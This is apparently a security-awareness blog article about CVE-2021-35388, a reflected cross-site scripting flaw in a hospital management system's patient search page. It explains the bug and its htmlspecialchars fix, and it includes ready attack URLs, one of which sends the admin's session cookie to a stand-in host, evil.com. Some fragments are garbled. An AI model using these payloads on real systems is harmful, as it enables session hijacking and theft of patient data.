The security of healthcare software is often overlooked, but as real incidents show, it should be a top priority. In this article, we’ll discuss a real vulnerability, CVE-2021-35388, that hits Hospital Management System version 4.. This bug exposes sensitive hospital data through Cross Site Scripting (XSS) in the patient search page—potentially allowing attackers to steal patient information, hijack sessions, and execute unrestricted actions.

Read on for a clear explanation of how this attack works, complete with exploitable code snippets, how to reproduce the bug, and tips for staying protected.

What is CVE-2021-35388?

CVE-2021-35388 refers to a Cross Site Scripting (XSS) vulnerability found in the Hospital Management System (HMS) v4., specifically via the file:

/hospital/hms/admin/patient-search.php

An attacker can inject malicious JavaScript code by manipulating the search parameters, which then gets executed in an admin’s browser. This allows attackers to steal authentication cookies, deface webpages, or redirect users—without ever needing a login.

Digging Deeper: How Does the XSS Bug Work?

HMS 4.’s patient-search.php fails to sanitize user input. Any search term provided by the attacker is echoed back into the HTML page, where scripts are executed inside the browser.

Example attack URL

http://your-hospital-domain/hospital/hms/admin/patient-search.php?searchdata=%22%3E%3Cscript%3Ealert('XSS!')%3C/script%3E

Decoded, the searchdata becomes

"><script>alert('XSS!')</script>

When this search term is used, the page will alert “XSS!”, but more damaging payloads are possible.

`

http://your-hospital-domain/hospital/hms/admin/patient-search.php

`html

">alert('Got you!')

`

http://your-hospital-domain/hospital/hms/admin/patient-search.php?searchdata=%22%3E%3Cscript%3Edocument.location='http://evil.com/steal?cookie='+document.cookie%3C/script%3E

Here’s a simplified version of the vulnerable code

<!-- patient-search.php -->
<form method="get">
    <input type="text" name="searchdata" value="<?php echo $_GET['searchdata']; ?>" />
    <input type="submit" value="Search" />
</form>

The Problem: User input ($_GET['searchdata']) is echoed without sanitizing, making the page vulnerable to XSS.

The Secure Way: Use htmlspecialchars

<input type="text" name="searchdata" value="<?php echo htmlspecialchars($_GET['searchdata']); ?>" />


This change stops scripts from being executed, rendering them harmless.

National Vulnerability Database (NVD):

https://nvd.nist.gov/vuln/detail/CVE-2021-35388

Exploit-DB advisory:

https://www.exploit-db.com/exploits/50178

Original advisory on vulncode-io:

https://www.vulncode.io/CVE-2021-35388 (when available)

HTML escaping best practices:

OWASP XSS Prevention Cheat Sheet

Patch your system: Upgrade to the latest HMS (check with your vendor for a security update).

2. Sanitize Input in every HTML context using htmlspecialchars() or frameworks that auto-encode data.

Final Words

CVE-2021-35388 is a strong reminder: even life-saving tools like hospital systems can become risky if not built and maintained securely. Check your HMS version, patch quickly, and always sanitize user input—especially where lives are at stake.

If you think your system might be vulnerable, act today. Prevent the next breach before it can start.


Stay safe, and share this with your IT and healthcare security teams!


*This article is written exclusively for security awareness and educational purposes. Exploit responsibly and report issues to vendors or admins when discovered.*

Timeline

Published on: 10/28/2022 15:15:00 UTC
Last modified on: 10/28/2022 18:33:00 UTC